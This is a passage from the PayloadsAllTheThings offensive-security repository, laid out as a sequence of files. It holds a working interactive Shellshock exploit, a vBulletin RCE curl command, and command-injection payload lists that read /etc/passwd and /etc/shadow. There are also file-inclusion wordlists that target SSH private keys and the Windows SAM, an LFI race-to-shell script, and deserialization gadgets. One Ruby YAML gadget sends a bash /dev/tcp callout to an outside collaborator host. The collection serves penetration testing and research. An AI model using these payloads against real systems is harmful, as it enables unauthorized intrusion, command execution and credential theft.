21 |         print("Usage: shell_shocker <URL>")
22 |         sys.exit(0)
23 | 
24 | URL=sys.argv[1]
25 | print("[+] Attempting Shell_Shock - Make sure to type full path")
26 | 
27 | while True:
28 |         command=input("~$ ")
29 |         opener=urllib.request.build_opener()
30 |         opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command)]
31 |         try:
32 |                 response=opener.open(URL)
33 |                 for line in response.readlines():
34 |                         print(line.strip())
35 |         except Exception as e: print(e)
36 | 
37 | 


--------------------------------------------------------------------------------
/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh:
--------------------------------------------------------------------------------
1 | curl https://example.com/index.php\?routestring\=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo system('id');exit;"


--------------------------------------------------------------------------------
/Command Injection/Intruder/command-execution-unix.txt:
--------------------------------------------------------------------------------
 1 | &lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;
 2 | &lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;
 3 | &lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
 4 | &lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
 5 | /index.html|id|
 6 | ";id;"
 7 | ';id;'
 8 | ;id;
 9 | ;id
10 | ;netstat -a;
11 | "|id|"
12 | '|id|'
13 | |id
14 | |/usr/bin/id
15 | |id|
16 | "|/usr/bin/id|"
17 | '|/usr/bin/id|'
18 | |/usr/bin/id|
19 | "||/usr/bin/id|"
20 | '||/usr/bin/id|'
21 | ||/usr/bin/id|
22 | |id;
23 | ||/usr/bin/id;
24 | ;id|
25 | ;|/usr/bin/id|
26 | "\n/bin/ls -al\n"
27 | '\n/bin/ls -al\n'
28 | \n/bin/ls -al\n
29 | \n/usr/bin/id\n
30 | \nid\n
31 | \n/usr/bin/id;
32 | \nid;
33 | \n/usr/bin/id|
34 | \nid|
35 | ;/usr/bin/id\n
36 | ;id\n
37 | |usr/bin/id\n
38 | |nid\n
39 | `id`
40 | `/usr/bin/id`
41 | a);id
42 | a;id
43 | a);id;
44 | a;id;
45 | a);id|
46 | a;id|
47 | a)|id
48 | a|id
49 | a)|id;
50 | a|id
51 | |/bin/ls -al
52 | a);/usr/bin/id
53 | a;/usr/bin/id
54 | a);/usr/bin/id;
55 | a;/usr/bin/id;
56 | a);/usr/bin/id|
57 | a;/usr/bin/id|
58 | a)|/usr/bin/id
59 | a|/usr/bin/id
60 | a)|/usr/bin/id;
61 | a|/usr/bin/id
62 | ;system('cat%20/etc/passwd')
63 | ;system('id')
64 | ;system('/usr/bin/id')
65 | %0Acat%20/etc/passwd
66 | %0A/usr/bin/id
67 | %0Aid
68 | %22%0A/usr/bin/id%0A%22
69 | %27%0A/usr/bin/id%0A%27
70 | %0A/usr/bin/id%0A
71 | %0Aid%0A
72 | "& ping -i 30 127.0.0.1 &"
73 | '& ping -i 30 127.0.0.1 &'
74 | & ping -i 30 127.0.0.1 &
75 | & ping -n 30 127.0.0.1 &
76 | %0a ping -i 30 127.0.0.1 %0a
77 | `ping 127.0.0.1`
78 | | id
79 | & id
80 | ; id
81 | %0a id %0a
82 | `id`
83 | $;/usr/bin/id
84 | 


--------------------------------------------------------------------------------
/Cross-Site Request Forgery/Images/CSRF-CheatSheet.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Cross-Site Request Forgery/Images/CSRF-CheatSheet.png


--------------------------------------------------------------------------------
/DISCLAIMER.md:
--------------------------------------------------------------------------------
 1 | # DISCLAIMER
 2 | 
 3 | The authors and contributors of this repository disclaim any and all responsibility for the misuse of the information, tools, or techniques described herein. The content is provided solely for educational and research purposes. Users are strictly advised to utilize this information in accordance with applicable laws and regulations and only on systems for which they have explicit authorization.
 4 | 
 5 | By accessing and using this repository, you agree to:
 6 | 
 7 | * Refrain from using the provided information for any unethical or illegal activities.
 8 | * Ensure that all testing and experimentation are conducted responsibly and with proper authorization.
 9 | * Acknowledge that any actions you take based on the contents of this repository are solely your responsibility.
10 | 
11 | Neither the authors nor contributors shall be held liable for any damages, direct or indirect, resulting from the misuse or unauthorized application of the knowledge contained herein. Always act mindfully, ethically, and within the boundaries of the law.
12 | 


--------------------------------------------------------------------------------
/Dependency Confusion/README.md:
--------------------------------------------------------------------------------
 1 | # Dependency Confusion
 2 | 
 3 | > A dependency confusion attack or supply chain substitution attack occurs when a software installer script is tricked into pulling a malicious code file from a public repository instead of the intended file of the same name from an internal repository.
 4 | 
 5 | ## Summary
 6 | 
 7 | * [Tools](#tools)
 8 | * [Methodology](#methodology)
 9 |     * [NPM Example](#npm-example)
10 | * [References](#references)
11 | 
12 | ## Tools
13 | 
14 | * [visma-prodsec/confused](https://github.com/visma-prodsec/confused) - Tool to check for dependency confusion vulnerabilities in multiple package management systems
15 | * [synacktiv/DepFuzzer](https://github.com/synacktiv/DepFuzzer) - Tool used to find dependency confusion or project where owner's email can be takeover.
16 | 
17 | ## Methodology
18 | 
19 | Look for `npm`, `pip`, `gem` packages, the methodology is the same : you register a public package with the same name of private one used by the company and then you wait for it to be used.
20 | 
21 | * **DockerHub**: Dockerfile image
22 | * **JavaScript** (npm): package.json
23 | * **MVN** (maven): pom.xml
24 | * **PHP** (composer): composer.json
25 | * **Python** (pypi): requirements.txt
26 | 
27 | ### NPM Example
28 | 
29 | * List all the packages (ie: package.json, composer.json, ...)
30 | * Find the package missing from [www.npmjs.com](https://www.npmjs.com/)
31 | * Register and create a **public** package with the same name
32 |     * Package example : [0xsapra/dependency-confusion-expoit](https://github.com/0xsapra/dependency-confusion-expoit)
33 | 
34 | ## References
35 | 
36 | * [Exploiting Dependency Confusion - Aman Sapra (0xsapra) - 2 Jul 2021](https://0xsapra.github.io/website//Exploiting-Dependency-Confusion)
37 | * [Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies - Alex Birsan - 9 Feb 2021](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
38 | * [3 Ways to Mitigate Risk When Using Private Package Feeds - Microsoft - 29/03/2021](https://web.archive.org/web/20210210121930/https://azure.microsoft.com/en-gb/resources/3-ways-to-mitigate-risk-using-private-package-feeds/)
39 | * [$130,000+ Learn New Hacking Technique in 2021 - Dependency Confusion - Bug Bounty Reports Explained - 22 févr. 2021](https://www.youtube.com/watch?v=zFHJwehpBrU)
40 | 


--------------------------------------------------------------------------------
/File Inclusion/Files/uploadlfi.py:
--------------------------------------------------------------------------------
 1 | from __future__ import print_function
 2 | from builtins import range
 3 | import itertools
 4 | import requests
 5 | import string
 6 | import sys
 7 | 
 8 | print('[+] Trying to win the race')
 9 | f = {'file': open('shell.php', 'rb')}
10 | for _ in range(4096 * 4096):
11 |     requests.post('http://target.com/index.php?c=index.php', f)
12 | 
13 | 
14 | print('[+] Bruteforcing the inclusion')
15 | for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
16 |     url = 'http://target.com/index.php?c=/tmp/php' + fname
17 |     r = requests.get(url)
18 |     if 'load average' in r.text:  # <?php echo system('uptime');
19 |         print('[+] We have got a shell: ' + url)
20 |         sys.exit(0)
21 | 
22 | print('[x] Something went wrong, please try again')
23 | 


--------------------------------------------------------------------------------
/File Inclusion/Intruders/BSD-files.txt:
--------------------------------------------------------------------------------
 1 | /usr/pkg/etc/httpd/httpd.conf
 2 | /usr/local/etc/apache22/httpd.conf
 3 | /usr/local/etc/apache2/httpd.conf
 4 | /var/www/conf/httpd.conf
 5 | /var/www/logs/error_log
 6 | /var/www/logs/access_log
 7 | /etc/apache2/httpd2.conf
 8 | /var/apache2/logs/error_log
 9 | /var/apache2/logs/access_log
10 | /var/log/httpd-error.log
11 | /var/log/httpd-access.log
12 | /var/log/httpd/error_log
13 | /var/log/httpd/access_log


--------------------------------------------------------------------------------
/File Inclusion/Intruders/LFI-FD-check.txt:
--------------------------------------------------------------------------------
 1 | /proc/self/cmdline
 2 | /proc/self/stat
 3 | /proc/self/status
 4 | /proc/self/fd/0
 5 | /proc/self/fd/1
 6 | /proc/self/fd/2
 7 | /proc/self/fd/3
 8 | /proc/self/fd/4
 9 | /proc/self/fd/5
10 | /proc/self/fd/6
11 | /proc/self/fd/7
12 | /proc/self/fd/8
13 | /proc/self/fd/9
14 | /proc/self/fd/10
15 | /proc/self/fd/11
16 | /proc/self/fd/12
17 | /proc/self/fd/13
18 | /proc/self/fd/14
19 | /proc/self/fd/15
20 | /proc/self/fd/16
21 | /proc/self/fd/17
22 | /proc/self/fd/18
23 | /proc/self/fd/19
24 | /proc/self/fd/20
25 | /proc/self/fd/21
26 | /proc/self/fd/22
27 | /proc/self/fd/23
28 | /proc/self/fd/24
29 | /proc/self/fd/25
30 | /proc/self/fd/26
31 | /proc/self/fd/27
32 | /proc/self/fd/28
33 | /proc/self/fd/29
34 | /proc/self/fd/30
35 | /proc/self/fd/31
36 | /proc/self/fd/32
37 | /proc/self/fd/33
38 | /proc/self/fd/34
39 | /proc/self/fd/35


--------------------------------------------------------------------------------
/File Inclusion/Intruders/LFI-WindowsFileCheck.txt:
--------------------------------------------------------------------------------
 1 | php://input
 2 | C:\boot.ini
 3 | C:\WINDOWS\win.ini
 4 | C:\WINDOWS\php.ini
 5 | C:\WINDOWS\System32\Config\SAM
 6 | C:\WINNT\php.ini
 7 | C:\xampp\phpMyAdmin\config.inc
 8 | C:\xampp\phpMyAdmin\phpinfo.php
 9 | C:\xampp\phpmyadmin\config.inc
10 | C:\xampp\phpmyadmin\phpinfo.php
11 | C:\xampp\phpmyadmin\config.inc.php
12 | C:\xampp\phpMyAdmin\config.inc.php
13 | C:\xampp\apache\conf\httpd.conf
14 | C:\xampp\FileZillaFTP\FileZilla Server.xml
15 | C:\xampp\MercuryMail\mercury.ini
16 | C:\mysql\bin\my.ini
17 | C:\xampp\php\php.ini
18 | C:\xampp\phpMyAdmin\config.inc.php
19 | C:\xampp\tomcat\conf\tomcat-users.xml
20 | C:\xampp\tomcat\conf\web.xml
21 | C:\xampp\sendmail\sendmail.ini
22 | C:\xampp\webalizer\webalizer.conf
23 | C:\xampp\webdav\webdav.txt
24 | C:\xampp\apache\logs\error.log
25 | C:\xampp\apache\logs\access.log
26 | C:\xampp\FileZillaFTP\Logs
27 | C:\xampp\FileZillaFTP\Logs\error.log
28 | C:\xampp\FileZillaFTP\Logs\access.log
29 | C:\xampp\MercuryMail\LOGS\error.log
30 | C:\xampp\MercuryMail\LOGS\access.log
31 | C:\xampp\mysql\data\mysql.err
32 | C:\xampp\sendmail\sendmail.log
33 | C:\apache\log\error.log
34 | C:\apache\log\access.log
35 | C:\apache\log\error_log
36 | C:\apache\log\access_log
37 | C:\apache2\log\error.log
38 | C:\apache2\log\access.log
39 | C:\apache2\log\error_log
40 | C:\apache2\log\access_log
41 | C:\log\error.log
42 | C:\log\access.log
43 | C:\log\error_log
44 | C:\log\access_log
45 | C:\apache\logs\error.log
46 | C:\apache\logs\access.log
47 | C:\apache\logs\error_log
48 | C:\apache\logs\access_log
49 | C:\apache2\logs\error.log
50 | C:\apache2\logs\access.log
51 | C:\apache2\logs\error_log
52 | C:\apache2\logs\access_log
53 | C:\logs\error.log
54 | C:\logs\access.log
55 | C:\logs\error_log
56 | C:\logs\access_log
57 | C:\log\httpd\access_log
58 | C:\log\httpd\error_log
59 | C:\logs\httpd\access_log
60 | C:\logs\httpd\error_log
61 | C:\opt\xampp\logs\access_log
62 | C:\opt\xampp\logs\error_log
63 | C:\opt\xampp\logs\access.log
64 | C:\opt\xampp\logs\error.log
65 | C:\Program Files\Apache Group\Apache\logs\access.log
66 | C:\Program Files\Apache Group\Apache\logs\error.log
67 | C:\Program Files\Apache Group\Apache\conf\httpd.conf
68 | C:\Program Files\Apache Group\Apache2\conf\httpd.conf
69 | C:\Program Files\xampp\apache\conf\httpd.conf
70 | 


--------------------------------------------------------------------------------
/File Inclusion/Intruders/Linux-files.txt:
--------------------------------------------------------------------------------
 1 | /etc/passwd
 2 | /etc/group
 3 | /etc/hosts
 4 | /etc/motd
 5 | /etc/issue
 6 | /etc/bashrc
 7 | /etc/apache2/apache2.conf
 8 | /etc/apache2/ports.conf
 9 | /etc/apache2/sites-available/default
10 | /etc/httpd/conf/httpd.conf
11 | /etc/httpd/conf.d
12 | /etc/httpd/logs/access.log
13 | /etc/httpd/logs/access_log
14 | /etc/httpd/logs/error.log
15 | /etc/httpd/logs/error_log
16 | /etc/init.d/apache2
17 | /etc/mysql/my.cnf
18 | /etc/nginx.conf
19 | /opt/lampp/logs/access_log
20 | /opt/lampp/logs/error_log
21 | /opt/lamp/log/access_log
22 | /opt/lamp/logs/error_log
23 | /proc/self/environ
24 | /proc/version
25 | /proc/cmdline
26 | /proc/mounts
27 | /proc/config.gz
28 | /root/.bashrc
29 | /root/.bash_history
30 | /root/.ssh/authorized_keys
31 | /root/.ssh/id_rsa
32 | /root/.ssh/id_rsa.keystore
33 | /root/.ssh/id_rsa.pub
34 | /root/.ssh/known_hosts
35 | /usr/local/apache/htdocs/index.html
36 | /usr/local/apache/conf/httpd.conf
37 | /usr/local/apache/conf/extra/httpd-ssl.conf
38 | /usr/local/apache/logs/error_log
39 | /usr/local/apache/logs/access_log
40 | /usr/local/apache/bin/apachectl
41 | /usr/local/apache2/htdocs/index.html
42 | /usr/local/apache2/conf/httpd.conf
43 | /usr/local/apache2/conf/extra/httpd-ssl.conf
44 | /usr/local/apache2/logs/error_log
45 | /usr/local/apache2/logs/access_log
46 | /usr/local/apache2/bin/apachectl
47 | /usr/local/etc/nginx/nginx.conf
48 | /usr/local/nginx/conf/nginx.conf
49 | /var/apache/logs/access_log
50 | /var/apache/logs/access.log
51 | /var/apache/logs/error_log
52 | /var/apache/logs/error.log
53 | /var/log/apache/access.log
54 | /var/log/apache/access_log
55 | /var/log/apache/error.log
56 | /var/log/apache/error_log
57 | /var/log/httpd/error_log
58 | /var/log/httpd/access_log
59 | /var/log/nginx/access_log
60 | /var/log/nginx/access.log
61 | /var/log/nginx/error_log
62 | /var/log/nginx/error.log


--------------------------------------------------------------------------------
/File Inclusion/Intruders/Mac-files.txt:
--------------------------------------------------------------------------------
1 | /etc/apache2/httpd.conf
2 | /Library/WebServer/Documents/index.html
3 | /private/var/log/appstore.log
4 | /var/log/apache2/error_log
5 | /var/log/apache2/access_log
6 | /usr/local/nginx/conf/nginx.conf
7 | /var/log/nginx/error_log
8 | /var/log/nginx/access_log


--------------------------------------------------------------------------------
/File Inclusion/Intruders/Web-files.txt:
--------------------------------------------------------------------------------
 1 | /robots.txt
 2 | /humans.txt
 3 | /style.css
 4 | /configuration.php
 5 | wp-login.php
 6 | wp-admin.php
 7 | /wp-content/plugins
 8 | /include/config.php
 9 | /inc/config.php
10 | /include/mysql.php
11 | /inc/mysql.php
12 | /sites/defaults/settings.php
13 | /phpmyadmin/changelog.php
14 | web.config


--------------------------------------------------------------------------------
/File Inclusion/Intruders/php-filter-iconv.txt:
--------------------------------------------------------------------------------
 1 | convert.iconv.437.CP930
 2 | convert.iconv.CP1390.CSIBM932
 3 | convert.iconv.CP273.CP1122
 4 | convert.iconv.CP285.CP280
 5 | convert.iconv.CSISO5427CYRILLIC.855
 6 | convert.iconv.CSN_369103.CP770
 7 | convert.iconv.CSUNICODE.CSUNICODE
 8 | convert.iconv.CSUNICODE.UCS-2BE
 9 | convert.iconv.ES.IBM037
10 | convert.iconv.ES.IBM930
11 | convert.iconv.IBM037.CP1250
12 | convert.iconv.IBM037.IBM256
13 | convert.iconv.IBM037.IBM280
14 | convert.iconv.IBM037.IBM860
15 | convert.iconv.IBM1122.IBM273
16 | convert.iconv.IBM1137.8859_1
17 | convert.iconv.IBM1141.8859_1
18 | convert.iconv.IBM1141.IBM4517
19 | convert.iconv.IBM1145.IBM850
20 | convert.iconv.IBM1148.EBCDIC-AT-DE-A
21 | convert.iconv.IBM1149.MAC-SAMI
22 | convert.iconv.IBM1390.IBM932
23 | convert.iconv.IBM1390.IBM939
24 | convert.iconv.IBM1399.IBM930
25 | convert.iconv.IBM256.IBM273
26 | convert.iconv.IBM273.CWI
27 | convert.iconv.IBM273.ES
28 | convert.iconv.IBM273.IBM420
29 | convert.iconv.IBM273.IT
30 | convert.iconv.IBM273.PT
31 | convert.iconv.IBM273.US
32 | convert.iconv.IBM277.ISO-8859-9E
33 | convert.iconv.IBM278.IBM861
34 | convert.iconv.IBM278.MIK
35 | convert.iconv.IBM284.IBM278
36 | convert.iconv.IBM297.IBM273
37 | convert.iconv.IBM297.IBM280
38 | convert.iconv.IBM4971.ARMSCII-8
39 | convert.iconv.IBM870.MAC-IS
40 | convert.iconv.L1.UCS-4
41 | convert.iconv.L1.UCS-4LE
42 | convert.iconv.L1.UTF16LE
43 | convert.iconv.L1.utf7
44 | convert.iconv.L1.UTF7
45 | convert.iconv.UCS-4LE.10646-1:1993
46 | convert.iconv.UTF16.UTF16
47 | convert.iconv..UTF7
48 | convert.iconv.UTF8.CP930
49 | convert.iconv.UTF8.IBM1140
50 | convert.iconv.VISCII.MSZ_7795.3


--------------------------------------------------------------------------------
/File Inclusion/Intruders/simple-check.txt:
--------------------------------------------------------------------------------
 1 | etc/passwd
 2 | etc/passwd%00
 3 | etc%2fpasswd
 4 | etc%2fpasswd%00
 5 | etc%5cpasswd
 6 | etc%5cpasswd%00
 7 | etc%c0%afpasswd
 8 | etc%c0%afpasswd%00
 9 | C:\boot.ini
10 | C:\WINDOWS\win.ini


--------------------------------------------------------------------------------
/GraphQL Injection/Images/htb-help.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/GraphQL Injection/Images/htb-help.png


--------------------------------------------------------------------------------
/Headless Browser/files/iframe.html:
--------------------------------------------------------------------------------
1 | <html>
2 |     <body>
3 |         <iframe src="/etc/passwd" height="640" width="640"></iframe>
4 |     </body>
5 | </html>


--------------------------------------------------------------------------------
/Headless Browser/files/window_location_js.html:
--------------------------------------------------------------------------------
1 | <html>
2 |     <body>
3 |         <script>
4 |             window.location="/etc/passwd"
5 |         </script>
6 |     </body>
7 | </html>


--------------------------------------------------------------------------------
/Hidden Parameters/README.md:
--------------------------------------------------------------------------------
 1 | # HTTP Hidden Parameters
 2 | 
 3 | > Web applications often have hidden or undocumented parameters that are not exposed in the user interface. Fuzzing can help discover these parameters, which might be vulnerable to various attacks.
 4 | 
 5 | ## Summary
 6 | 
 7 | * [Tools](#tools)
 8 | * [Methodology](#methodology)
 9 |     * [Bruteforce Parameters](#bruteforce-parameters)
10 |     * [Old Parameters](#old-parameters)
11 | * [References](#references)
12 | 
13 | ## Tools
14 | 
15 | * [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner) - Burp extension to identify hidden, unlinked parameters.
16 | * [s0md3v/Arjun](https://github.com/s0md3v/Arjun) - HTTP parameter discovery suite
17 | * [Sh1Yo/x8](https://github.com/Sh1Yo/x8) - Hidden parameters discovery suite
18 | * [tomnomnom/waybackurls](https://github.com/tomnomnom/waybackurls) - Fetch all the URLs that the Wayback Machine knows about for a domain
19 | * [devanshbatham/ParamSpider](https://github.com/devanshbatham/ParamSpider) - Mining URLs from dark corners of Web Archives for bug hunting/fuzzing/further probing
20 | 
21 | ## Methodology
22 | 
23 | ### Bruteforce Parameters
24 | 
25 | * Use wordlists of common parameters and send them, look for unexpected behavior from the backend.
26 | 
27 |     ```ps1
28 |     x8 -u "https://example.com/" -w <wordlist>
29 |     x8 -u "https://example.com/" -X POST -w <wordlist>
30 |     ```
31 | 
32 | Wordlist examples:
33 | 
34 | * [Arjun/large.txt](https://github.com/s0md3v/Arjun/blob/master/arjun/db/large.txt)
35 | * [Arjun/medium.txt](https://github.com/s0md3v/Arjun/blob/master/arjun/db/medium.txt)
36 | * [Arjun/small.txt](https://github.com/s0md3v/Arjun/blob/master/arjun/db/small.txt)
37 | * [samlists/sam-cc-parameters-lowercase-all.txt](https://github.com/the-xentropy/samlists/blob/main/sam-cc-parameters-lowercase-all.txt)
38 | * [samlists/sam-cc-parameters-mixedcase-all.txt](https://github.com/the-xentropy/samlists/blob/main/sam-cc-parameters-mixedcase-all.txt)
39 | 
40 | ### Old Parameters
41 | 
42 | Explore all the URL from your targets to find old parameters.
43 | 
44 | * Browse the [Wayback Machine](http://web.archive.org/)
45 | * Look through the JS files to discover unused parameters
46 | 
47 | ## References
48 | 
49 | * [Hacker tools: Arjun – The parameter discovery tool - Intigriti - May 17, 2021](https://blog.intigriti.com/2021/05/17/hacker-tools-arjun-the-parameter-discovery-tool/)
50 | * [Parameter Discovery: A quick guide to start - YesWeHack - April 20, 2022](http://web.archive.org/web/20220420123306/https://blog.yeswehack.com/yeswerhackers/parameter-discovery-quick-guide-to-start)
51 | 


--------------------------------------------------------------------------------
/Insecure Deserialization/Files/Ruby_universal_gadget_generate_verify.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | 
 3 | class Gem::StubSpecification
 4 |   def initialize; end
 5 | end
 6 | 
 7 | 
 8 | stub_specification = Gem::StubSpecification.new
 9 | stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2")
10 | 
11 | puts "STEP n"
12 | stub_specification.name rescue nil
13 | puts
14 | 
15 | 
16 | class Gem::Source::SpecificFile
17 |   def initialize; end
18 | end
19 | 
20 | specific_file = Gem::Source::SpecificFile.new
21 | specific_file.instance_variable_set(:@spec, stub_specification)
22 | 
23 | other_specific_file = Gem::Source::SpecificFile.new
24 | 
25 | puts "STEP n-1"
26 | specific_file <=> other_specific_file rescue nil
27 | puts
28 | 
29 | 
30 | $dependency_list= Gem::DependencyList.new
31 | $dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file])
32 | 
33 | puts "STEP n-2"
34 | $dependency_list.each{} rescue nil
35 | puts
36 | 
37 | 
38 | class Gem::Requirement
39 |   def marshal_dump
40 |     [$dependency_list]
41 |   end
42 | end
43 | 
44 | payload = Marshal.dump(Gem::Requirement.new)
45 | 
46 | puts "STEP n-3"
47 | Marshal.load(payload) rescue nil
48 | puts
49 | 
50 | 
51 | puts "VALIDATION (in fresh ruby process):"
52 | IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe|
53 |   pipe.print payload
54 |   pipe.close_write
55 |   puts pipe.gets
56 |   puts
57 | end
58 | 
59 | puts "Payload (hex):"
60 | puts payload.unpack('H*')[0]
61 | puts
62 | 
63 | 
64 | require "base64"
65 | puts "Payload (Base64 encoded):"
66 | puts Base64.encode64(payload)


--------------------------------------------------------------------------------
/Insecure Deserialization/Files/node-serialize.js:
--------------------------------------------------------------------------------
1 | var y = {
2 |     rce : function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });},
3 | }
4 | var serialize = require('node-serialize');
5 | console.log("Serialized: \n" + serialize.serialize(y));


--------------------------------------------------------------------------------
/Insecure Deserialization/Files/ruby-serialize.yaml:
--------------------------------------------------------------------------------
 1 | ---
 2 | - !ruby/object:Gem::Installer
 3 |     i: x
 4 | - !ruby/object:Gem::SpecFetcher
 5 |     i: y
 6 | - !ruby/object:Gem::Requirement
 7 |   requirements:
 8 |     !ruby/object:Gem::Package::TarReader
 9 |     io: &1 !ruby/object:Net::BufferedIO
10 |       io: &1 !ruby/object:Gem::Package::TarReader::Entry
11 |          read: 0
12 |          header: "abc"
13 |       debug_output: &1 !ruby/object:Net::WriteAdapter
14 |          socket: &1 !ruby/object:Gem::RequestSet
15 |              sets: !ruby/object:Net::WriteAdapter
16 |                  socket: !ruby/module 'Kernel'
17 |                  method_id: :system
18 |              git_set: "bash -c 'echo 1 > /dev/tcp/`whoami`.`hostname`.wkkib01k9lsnq9qm2pogo10tmksagz.burpcollaborator.net/443'"
19 |          method_id: :resolve


--------------------------------------------------------------------------------
/Insecure Deserialization/Images/NETNativeFormatters.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Insecure Deserialization/Images/NETNativeFormatters.png


--------------------------------------------------------------------------------
/Insecure Deserialization/Node.md:
--------------------------------------------------------------------------------
 1 | # Node Deserialization
 2 | 
 3 | > Node.js deserialization refers to the process of reconstructing JavaScript objects from a serialized format, such as JSON, BSON, or other formats that represent structured data. In Node.js applications, serialization and deserialization are commonly used for data storage, caching, and inter-process communication.
 4 | 
 5 | ## Summary
 6 | 
 7 | * [Methodology](#methodology)
 8 |     * [node-serialize](#node-serialize)
 9 |     * [funcster](#funcster)
10 | * [References](#references)
11 | 
12 | ## Methodology
13 | 
14 | * In Node source code, look for:
15 | 
16 |     * `node-serialize`
17 |     * `serialize-to-js`
18 |     * `funcster`
19 | 
20 | ### node-serialize
21 | 
22 | > An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the `unserialize()` function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).
23 | 
24 | 1. Generate a serialized payload
25 | 
26 |     ```js
27 |     var y = {
28 |         rce : function(){
29 |             require('child_process').exec('ls /', function(error,
30 |             stdout, stderr) { console.log(stdout) });
31 |         },
32 |     }
33 |     var serialize = require('node-serialize');
34 |     console.log("Serialized: \n" + serialize.serialize(y));
35 |     ```
36 | 
37 | 2. Add bracket `()` to force the execution
38 | 
39 |     ```js
40 |     {"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}()"}
41 |     ```
42 | 
43 | 3. Send the payload
44 | 
45 | ### funcster
46 | 
47 | ```js
48 | {"rce":{"__js_function":"function(){CMD=\"cmd /c calc\";const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').exec(CMD,function(error,stdout,stderr){console.log(stdout)});}()"}}
49 | ```
50 | 
51 | ## References
52 | 
53 | * [CVE-2017-5941 - National Vulnerability Database - February 9, 2017](https://nvd.nist.gov/vuln/detail/CVE-2017-5941)
54 | * [Exploiting Node.js deserialization bug for Remote Code Execution (CVE-2017-5941) - Ajin Abraham - October 31, 2018](https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf)
55 | * [NodeJS Deserialization - gonczor - January 8, 2020](https://blacksheephacks.pl/nodejs-deserialization/)
56 | 


--------------------------------------------------------------------------------
/Insecure Direct Object References/Images/idor.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Insecure Direct Object References/Images/idor.png


--------------------------------------------------------------------------------
/Insecure Management Interface/Intruder/springboot_actuator.txt:
--------------------------------------------------------------------------------
 1 | auditevents
 2 | autoconfig
 3 | beans
 4 | caches
 5 | conditions
 6 | configprops
 7 | dump
 8 | env
 9 | flyway
10 | health
11 | heapdump
12 | httptrace
13 | info
14 | integrationgraph
15 | jolokia
16 | logfile
17 | loggers
18 | liquibase
19 | metrics
20 | mappings
21 | prometheus
22 | scheduledtasks
23 | sessions
24 | shutdown
25 | threaddump
26 | trace
27 | actuator/auditevents
28 | actuator/autoconfig
29 | actuator/beans
30 | actuator/caches
31 | actuator/conditions
32 | actuator/configprops
33 | actuator/dump
34 | actuator/env
35 | actuator/flyway
36 | actuator/health
37 | actuator/heapdump
38 | actuator/httptrace
39 | actuator/info
40 | actuator/integrationgraph
41 | actuator/jolokia
42 | actuator/logfile
43 | actuator/loggers
44 | actuator/liquibase
45 | actuator/metrics
46 | actuator/mappings
47 | actuator/prometheus
48 | actuator/scheduledtasks
49 | actuator/sessions
50 | actuator/shutdown
51 | actuator/threaddump
52 | actuator/trace


--------------------------------------------------------------------------------
/Insecure Management Interface/README.md:
--------------------------------------------------------------------------------
 1 | # Insecure Management Interface
 2 | 
 3 | > Insecure Management Interface refers to vulnerabilities in administrative interfaces used for managing servers, applications, databases, or network devices. These interfaces often control sensitive settings and can have powerful access to system configurations, making them prime targets for attackers.
 4 | > Insecure Management Interfaces may lack proper security measures, such as strong authentication, encryption, or IP restrictions, allowing unauthorized users to potentially gain control over critical systems. Common issues include using default credentials, unencrypted communications, or exposing the interface to the public internet.
 5 | 
 6 | ## Summary
 7 | 
 8 | * [Methodology](#methodology)
 9 | * [References](#references)
10 | 
11 | ## Methodology
12 | 
13 | Insecure Management Interface vulnerabilities arise when administrative interfaces of systems or applications are improperly secured, allowing unauthorized or malicious users to gain access, modify configurations, or exploit sensitive operations. These interfaces are often critical for maintaining, monitoring, and controlling systems and must be secured rigorously.
14 | 
15 | * Lack of Authentication or Weak Authentication:
16 |     * Interfaces accessible without requiring credentials.
17 |     * Use of default or weak credentials (e.g., admin/admin).
18 | 
19 |     ```ps1
20 |     nuclei -t http/default-logins -u https://example.com
21 |     ```
22 | 
23 | * Exposure to the Public Internet
24 | 
25 |     ```ps1
26 |     nuclei -t http/exposed-panels -u https://example.com
27 |     nuclei -t http/exposures -u https://example.com
28 |     ```
29 | 
30 | * Sensitive data transmitted over plain HTTP or other unencrypted protocols
31 | 
32 | **Examples**:
33 | 
34 | * **Network Devices**: Routers, switches, or firewalls with default credentials or unpatched vulnerabilities.
35 | * **Web Applications**: Admin panels without authentication or exposed via predictable URLs (e.g., /admin).
36 | * **Cloud Services**: API endpoints without proper authentication or overly permissive roles.
37 | 
38 | ## References
39 | 
40 | * [CAPEC-121: Exploit Non-Production Interfaces - CAPEC - July 30, 2020](https://capec.mitre.org/data/definitions/121.html)
41 | * [Exploiting Spring Boot Actuators - Michael Stepankin - Feb 25, 2019](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)
